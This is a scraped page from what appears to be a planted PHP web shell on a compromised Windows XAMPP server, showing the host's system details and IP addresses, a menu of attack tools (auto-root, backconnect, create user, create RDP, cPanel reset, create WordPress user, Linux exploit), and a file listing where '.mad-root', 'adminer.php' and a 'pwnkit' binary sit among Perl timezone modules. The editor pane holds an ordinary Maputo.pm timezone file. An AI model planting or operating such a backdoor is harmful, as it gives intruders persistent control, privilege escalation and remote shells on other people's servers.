Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.214
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
perl /
vendor /
lib /
DateTime /
TimeZone /
Africa /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
Abidjan.pm
1.2
KB
-rw-rw-rw-
Accra.pm
15.52
KB
-rw-rw-rw-
Algiers.pm
9.07
KB
-rw-rw-rw-
Bissau.pm
1.44
KB
-rw-rw-rw-
Cairo.pm
31.47
KB
-rw-rw-rw-
Casablanca.pm
47.82
KB
-rw-rw-rw-
Ceuta.pm
30.51
KB
-rw-rw-rw-
El_Aaiun.pm
45.2
KB
-rw-rw-rw-
Johannesburg.pm
2.42
KB
-rw-rw-rw-
Juba.pm
9.13
KB
-rw-rw-rw-
Khartoum.pm
9.37
KB
-rw-rw-rw-
Lagos.pm
1.91
KB
-rw-rw-rw-
Maputo.pm
1.2
KB
-rw-rw-rw-
Monrovia.pm
1.68
KB
-rw-rw-rw-
Nairobi.pm
2.17
KB
-rw-rw-rw-
Ndjamena.pm
1.68
KB
-rw-rw-rw-
Sao_Tome.pm
1.92
KB
-rw-rw-rw-
Tripoli.pm
8.63
KB
-rw-rw-rw-
Tunis.pm
9.11
KB
-rw-rw-rw-
Windhoek.pm
13.65
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Maputo.pm
# This file is auto-generated by the Perl DateTime Suite time zone # code generator (0.08) This code generator comes with the # DateTime::TimeZone module distribution in the tools/ directory # # Generated from /tmp/h6QqPsv6Ap/africa. Olson data version 2020e # # Do not edit this file directly. # package DateTime::TimeZone::Africa::Maputo; use strict; use warnings; use namespace::autoclean; our $VERSION = '2.46'; use Class::Singleton 1.03; use DateTime::TimeZone; use DateTime::TimeZone::OlsonDB; @DateTime::TimeZone::Africa::Maputo::ISA = ( 'Class::Singleton', 'DateTime::TimeZone' ); my $spans = [ [ DateTime::TimeZone::NEG_INFINITY, # utc_start 60026392180, # utc_end 1903-02-28 21:49:40 (Sat) DateTime::TimeZone::NEG_INFINITY, # local_start 60026400000, # local_end 1903-03-01 00:00:00 (Sun) 7820, 0, 'LMT', ], [ 60026392180, # utc_start 1903-02-28 21:49:40 (Sat) DateTime::TimeZone::INFINITY, # utc_end 60026399380, # local_start 1903-02-28 23:49:40 (Sat) DateTime::TimeZone::INFINITY, # local_end 7200, 0, 'CAT', ], ]; sub olson_version {'2020e'} sub has_dst_changes {0} sub _max_year {2030} sub _new_instance { return shift->_init( @_, spans => $spans ); } 1;
Close